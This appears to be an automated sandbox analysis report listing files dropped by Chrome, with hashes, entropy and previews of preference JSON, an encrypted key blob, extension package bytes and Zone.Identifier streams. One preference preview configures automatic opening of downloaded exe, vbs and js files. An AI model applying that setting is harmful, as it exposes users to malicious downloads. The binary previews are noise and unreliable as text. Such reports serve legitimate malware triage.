C:\Users\user\AppData\Local\Google\Chrome\User Data\8229ac9c-caf6-4300-bcc7-70f228eaa60b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.0710229410721475
Encrypted:	false
SSDEEP:	1536:CS71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:3711NyBTOgd0HhmAnhqj3L
MD5:	D29464904F3A1089FBCAADBB0C6E3AD4
SHA1:	225AF8848543571596779611CBFA92F7B55C35B2
SHA-256:	BF877D0DD76808A00259766BC75E05716895EC550CF81F006F8BA184DD8EB93C
SHA-512:	26008F0CFC4A66D0930F4AD2A29AE968BC25E3260A39C5E141FC402F7C0F0DC9F4F3B35A53762662B4CBD11023F3C03A8BCC833D69762671106ECAB969F370BB
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\8771a473-d5f3-486a-a6ed-95e6a1c97595.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.0710229410721475
Encrypted:	false
SSDEEP:	1536:CS71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:3711NyBTOgd0HhmAnhqj3L
MD5:	D29464904F3A1089FBCAADBB0C6E3AD4
SHA1:	225AF8848543571596779611CBFA92F7B55C35B2
SHA-256:	BF877D0DD76808A00259766BC75E05716895EC550CF81F006F8BA184DD8EB93C
SHA-512:	26008F0CFC4A66D0930F4AD2A29AE968BC25E3260A39C5E141FC402F7C0F0DC9F4F3B35A53762662B4CBD11023F3C03A8BCC833D69762671106ECAB969F370BB
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\8dd04f8d-9016-4123-99f8-3933fe981886.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071022747873289
Encrypted:	false
SSDEEP:	1536:Nd71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:v711NyBTOgd0HhmAnhqj3L
MD5:	D0F076E819093D84EEDA870FDA791C2E
SHA1:	EB3C9F7621AC7DB7CBB570B7DA4EF74EC04EC722
SHA-256:	AAAEC44DF50F372CC7C2C79C9C540D6C630C6BF3EAFD89E6D1AE332D7808D6EA
SHA-512:	21FA990BD3A9C7E19855C967B1D8917539614BCF2173BBDC9407C84F2E150AF1150FEC7E0C4E41FE3E9E3BDD5155C228645D72FA72021C80EA8D42A8250B27B4
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\8fbf4ce8-ccee-4f6d-bf79-75ad619e6d08.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	120197
Entropy (8bit):	6.056596275058355
Encrypted:	false
SSDEEP:	3072:+0watS55TnNtTFS788k8oZE711NyBTOgd0HhmAnhqj3o:+0UHD3FS7V2QXNyTOpBmAh4o
MD5:	96637B6C03E1D7300C6203338FD52AB0
SHA1:	4BEE5388FEE1CCBC6769A6DFB205395DB9AA3DAD
SHA-256:	7F6ADA3588A0DFD5E08F4E57587FFFDBA067BC411303D23687C2FA05AAB48BBA
SHA-512:	E5D0294162A311730288F9A8BD5777B9A9BDBF45CA79B660CD2B6DBF75E32E4058F5634AF47AE728E72ADA3687FBB384A9A467D190C4846DC2502DFCE34B1063
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661251353674376e+12,"network":1.661218954e+12,"ticks":142651969.0,"uncertainty":2950572.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\91dcebc0-17f7-45bb-b364-9569d9a61409.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	118719
Entropy (8bit):	6.050490429521562
Encrypted:	false
SSDEEP:	3072:MatS55TnNtTFS788k8oZE711NyBTOgd0HhmAnhqj3o:IHD3FS7V2QXNyTOpBmAh4o
MD5:	86B23150A59DAC8489B415C75D1EF93C
SHA1:	D32E8503CB947BBAB73DB6E7AE09D0C5F915B232
SHA-256:	97AD790D162805CF7222A974DA1E37E958891C35E1E9DF02BBFE119BCE685A0E
SHA-512:	28DB3A04C96737B47E4031397AA4FB8E44EFE50B92263F6ECDF7261B8E25A594D143B5E9A886C63F87FCDF4B688674FBD4E7F081B9F5821553670269F477CD4E
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661251353674376e+12,"network":1.661218954e+12,"ticks":142651969.0,"uncertainty":2950572.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\9f73c7e2-286f-4513-986d-1d8e01bf40fb.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	118719
Entropy (8bit):	6.050489696706667
Encrypted:	false
SSDEEP:	3072:5atS55TnNtTFS788k8oZE711NyBTOgd0HhmAnhqj3o:PHD3FS7V2QXNyTOpBmAh4o
MD5:	E2E314794B6889C673F47B0C91FDB513
SHA1:	F286A259AE8F170EF97D68BA693296E9DEA1294B
SHA-256:	EB6721EA625D6DE41D00907259EAF733A2BD5ABDE915342FCE25F63D754BA1C0
SHA-512:	9207FEC5A3CC507CB0FB71C7BBB057E1AC0F00C76C3FCA22419BFBDE153132E82B79FFCEDCFBDB60685FC74B391C9F4FD837ED51A9B6B919B8538C0333E1C800
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661251353674376e+12,"network":1.661218954e+12,"ticks":142651969.0,"uncertainty":2950572.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	3.254162526001658
Encrypted:	false
SSDEEP:	3:FkXft0xE1n:+ftIE1n
MD5:	BD4642AD6C750A12D912B20BCB92E14D
SHA1:	C549F0F48FDD4FBC62E51AC26D7E185160CE2123
SHA-256:	4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
SHA-512:	04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
Malicious:	false
Reputation:	unknown
Preview:	sdPC....................s}.....M..2.!..%

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\034c1522-6da9-4d48-a9e8-c9921ca8ce5b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.923181998146334
Encrypted:	false
SSDEEP:	3:pFAPYQQVNv3BNn:UPS37
MD5:	6D942EE72911F2427FBA8B925074BA8C
SHA1:	9B197EF0996B7876FC1766B27193501CF2DB9977
SHA-256:	5B378488065252B2F12128D6A4DE60DC05FF044D484A8BF1D61E92E52FABA396
SHA-512:	56CBCC627045B0B322190738D0637AD9A536107C1598367238F163BCBF7DF829B1A38295BE2EE583D5A5DF0CBF3EBD17AB7EE044BC15C5C9CDCAC2E6ABE5B72A
Malicious:	false
Reputation:	unknown
Preview:	v10..e.....A....9..W.`..P.&.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\2742788a-927f-44ac-9cb1-42acc7ef2388.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9380
Entropy (8bit):	5.153928435860465
Encrypted:	false
SSDEEP:	192:YYP1XcaM88yy+F3p7Y4ksOkoUPwbdplKiWQbDYpqn0ttjEsXtSct:YOp+yx36S4k6YtIsXtSct
MD5:	2E9FEB904C0AD892AFDA309CDEE92082
SHA1:	C20793AD65F8F5C582E17EF87FF99D361EB64C0B
SHA-256:	78B538328A4321C833B21C8290BE2178E34AC2C5F677F5F9B88809362A23C237
SHA-512:	A7EC7DED18CC292B321DB23DF90DEBC9A90640C1278D3C3DCDD36226CFD362C4A26C512D436AB1583BB7E007023BD2BF1DB6B0D8DB1CB506821A71EA24B5E227
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305724952797194","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305724952778790"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\65c56dc1-b7f4-4068-a52f-cd0164b0fb6e.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Reputation:	unknown
Preview:	.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6dcb2c05-0fc4-4e5b-ae12-724027493292.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	14764
Entropy (8bit):	5.567850350056405
Encrypted:	false
SSDEEP:	384:0HqLlmXE1kXqKf/pUZNCgVLH2HftorUyQhY42:zLlsE1kXqKf/pUZNCgVLH2HfyrUhhYl
MD5:	CB389506F3BB0DC615248D86BDBF5102
SHA1:	2D2C03C7F0AB5BC9679D311A38894C8737827F05
SHA-256:	BB8C3E6CFBD970DD49577FC44EADF63AC312EA365BB0C0564F561011D03A1E33
SHA-512:	31329299411364911747E2D3DC20F3811341C6F11D49E6943FC5F81E822A2AD38848092DF72E805E55AD71632853BC4AFA563CEDAAFB4BF0E9F6C614F790C5ED
Malicious:	false
Reputation:	unknown
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305724951145714","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\1f258733-5a5e-4c9c-bae9-78250cbbfc3a

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	48399548
Entropy (8bit):	7.998960997202003
Encrypted:	true
SSDEEP:	786432:jVcuCYHEFjscSVbUhsfy/IbdHUudj5wy4EjUuJ9DFn80Yu+HATEDvBgxBVHw1Jdh:ZcuCkTVohgyQ59wy4EzNWggDv2xjUJUe
MD5:	F8432B18E3E4BF76AE683D4FB831873E
SHA1:	ADBBEF7F7E47CB9CD0FA4508F5D49AB3994BC88A
SHA-256:	2FB76AAAE2AFD77E633C301DC363AB476FCA4C945EC70BEB6F7CEE2EF7FF6041
SHA-512:	2F17D05BA9463CF5D50DD8CF315FA872C534F50682697770C66A3BDCA59805A488CE19411FD54953D86F2A90B7C7AB6854E8249BBD8179A4B617DCE1C7B77D6F
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............w.H..z.fl.#as.7.d....J[SpF.4.[..JuW@....E..)T....OzW..C..N.-.U...1..F..Y(.....E.F..M... ..X..1.D."y..{..)......!.@+..jC.;.u.=..+...W<e.......T...S0\|.5k.9A..B....;....jB.N.2u...S.Pv......Y>..F..h..Y0..s....x....tm.#.Z..I....n.8"....].4/....z...'cBp.H.....p..0..[l..?....\M..6....mQ...P...3Ru$...u.I.<.Nn.;Wvm....dd.I.m..>l....8./.....\..<..z...s..Y..vx]..>..@V_ &.'S.....D^h.[ng..G..e....>9...zl..1...8

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\1f258733-5a5e-4c9c-bae9-78250cbbfc3a:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.329148891296734
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaGfQDSA+F/8b3iDtWsL:qY3tNp40zMw/yHNKGf8z+FWiDhL
MD5:	42DAB3BE716D32C017C35C5CD76CF126
SHA1:	9FEB29E753A549FB3C406B0D15954ACD21A5E1DE
SHA-256:	69784623F345AA24D7C675D8C0A026EB9A167DBD01DFF25C1EC524E7ADC62E82
SHA-512:	B58D5C829FE16C33EE804BAEF709BAAECCC8EBE67A99DCD0FA33AB75AB320B4AEC6F7D8E6910EA152C74CBE73A8836D4195CF94B22620C56CAFF73323F174DE6
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1659361537155&target=OPTIMIZATION_TARGET_PAGE_ENTITIES..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\62d0eba2-16d3-4752-bd14-a088850bc7b7

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	265060
Entropy (8bit):	7.995649560918691
Encrypted:	true
SSDEEP:	6144:j71bE8xvMX08XghZNhvfhua/I4dMdYuw4/xCRxQkdE6oa:jp1xE3g3Nhvf39dMNxxyxGLa
MD5:	46D927BF3AE7285ECF3E1BEB08A6AD03
SHA1:	5B94DF9B032536DCA3C493B0A11341EFA7898477
SHA-256:	636EB2212BD1C34A6D9745F271AC0ED9695B727D2EF41747DD7E387C98F33EA5
SHA-512:	1DDAFD04C3F9B49D8E86F0E0B2CA438D851A3B7C4DDFF8BB982512F28A340DAC7D490EDBD5D3CF59C41B3E2F2F320B767557B8DD0E715366DFE0527F0E0003BF
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............\|...d...0j.Ta..68Q..B..3..Iq..._a......V...wa.'D.t.d.c2c/u..-..<......k.W.[..9`.....N.........[.l..B.y...4MQ........T..(....p..)1^....?..^.[.09A....d-.....r....9.......\.%a..-M..=.F#\.}.f.K.\:.....h.R.}b.......?n.?H!7......e.<.*f. !5q.8..i.,a.R:..@X3..=4....H.bD?....d^`\.=i....NO.I..J.6...y...o..O...w.c.....Z...Wu.n..8.0@.M.'.H6>F=.lm~^Km.....S.:..@r..U..........T..k.x.q...~m...J...)..#...F\..Wq.2..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\62d0eba2-16d3-4752-bd14-a088850bc7b7:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.427678974330711
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaGzIJShF/8b3iDXRm2mGAvn:qY3tNp40zMw/yHNKGG6FWiDXNXAv
MD5:	BBB6B216D77E537215AF590F04EE20A6
SHA1:	C8282C5F823F1561366656BAEB683E628BD7D1A2
SHA-256:	C1917E2FCC784CFD27ADE41207E6E4C1E13403E68F5397714E685D52B33CC6C8
SHA-512:	15ADEEC8FB13006C216F92807835DB5EEFB9349076D37B6FB7E7A16C77F54DE5E6D6BCD4B1AC14BB78F58E75217671216EFFB858478F4DA72104E4C70DF78D8F
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1660568498583&target=OPTIMIZATION_TARGET_LANGUAGE_DETECTION..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\6ff0e3a6-da7f-4c10-a22c-89391d4f6a91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	4955
Entropy (8bit):	7.9048440594438185
Encrypted:	false
SSDEEP:	96:m3Rjis6KpU2mQIuizB0QknoAGKQ6pL65a9gNWADJz8I13EdAhTtQ2LwI61abHwdz:cus6KatWifkoAGN6s5a9mFU+TRbQh3X
MD5:	766A3E17C6325AACDB116643EBE05F7D
SHA1:	E9709278668DC4C2930A956AFABA2A2E64029CF8
SHA-256:	1C6EE9F6267A7C38C8EC1CD015495A5C80324DC417A35672C9CC90931F89F1F4
SHA-512:	686CD14585D7AE04FAF2ADFF6B5F1DB575DB9B106BD5C97957DA2452FE6BBD617CFD01841976A5FFD248EFBC62D502AF0CC0B7989A3BB3C2A960EB29EE273F27
Malicious:	false
Reputation:	unknown
Preview:	Cr24....E.........0.."0....H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...\|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk\|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<...............@....A..h=....g..C..b.H.....nj.6.6...noT>..+3..;.0.(.ys.....{...x...,P.3+.\|...7j..z..@.:.[...).7.n..Y-..R3...j.\......y.....".......c......y...0s.E......g0.fC....F...l.......).....B.b$.$...U..'.1.[.:.L.b`..s1i...J.........$..#...".7.......K.b.).h.J.......#.2.a.p.B......s..'..s..'.Z.uS..de..B........3..2.,.A..ZT.~>..Y~sq!.,....).C0.c..1?B....1.@..Y.....w..I..f.y.S..H..X.6o.8(.... 1j....+I?....Bvs.h.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\6ff0e3a6-da7f-4c10-a22c-89391d4f6a91:Zone.Identifier

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.422913312692801
Encrypted:	false
SSDEEP:	3:gAWY3tNQWHY0zMwqELrrmHWKXaGXUUeQCA+F/8b3iDDz8LYXLFgjsjy:qY3tNp40zMw/yHNKGXNeQD+FWiDDbbFM
MD5:	552717125583DD0F982A19DC01C362FD
SHA1:	FF025F074C9A2038666E9653794A332BED7A855D
SHA-256:	95E0F4E79E26ABEDBD05456066F1733594CFCE1DE0773FFC91CDE8D04C591E16
SHA-512:	1E9092F725C3E3B238679CD6CC657FC0C50A22E276D79D37884CAC4B4E57A0BB4E005B875BDC3A16A4244B892243DF9C24043923E59E3CC92C5BEF99E13597A0
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1660568541167&target=OPTIMIZATION_TARGET_NOTIFICATION_PERMISSION_PREDICTIONS..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\f61e523a-b4e0-43de-92d9-d65c5dedd082

Download File

